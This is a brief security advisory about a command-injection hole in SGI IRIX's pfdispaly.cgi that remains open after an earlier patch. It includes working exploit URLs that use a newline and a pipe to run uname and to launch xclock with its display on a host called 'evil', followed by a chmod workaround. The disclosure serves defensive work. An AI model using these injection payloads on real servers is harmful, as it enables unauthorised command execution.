COMMAND

    /var/www/cgi-bin/pfdispaly.cgi (perfomer_tools)

SYSTEMS AFFECTED

    IRIX 6.2, 6.3, 6.4

PROBLEM

    J.A. Gutierrez found following.  There is already a patch from SGI
    to the pfdispaly.cgi '../..' bug, but it seems it fixes only  that
    problem,  without  checking  the  rest  of  the  code  for similar
    vulnerabilities, so  even after  patch 3018  (04/01/98; httpd  #6)
    you can try:

        $ lynx -dump http://victim/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'

        uname -a\| file

        IRIX victim 6.2 03131015 IP22

    or

        $ lynx -dump \
        http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'

SOLUTION

     Workaround is:

        # /bin/chmod 500 /var/www/cgi-bin/pfdispaly.cgi

    As for the fix, it is easy (for this particular problem); so  it's
    left to the reader.  Anyway, if you're using SGI cgi's you  should
    consider limiting the access to your domain...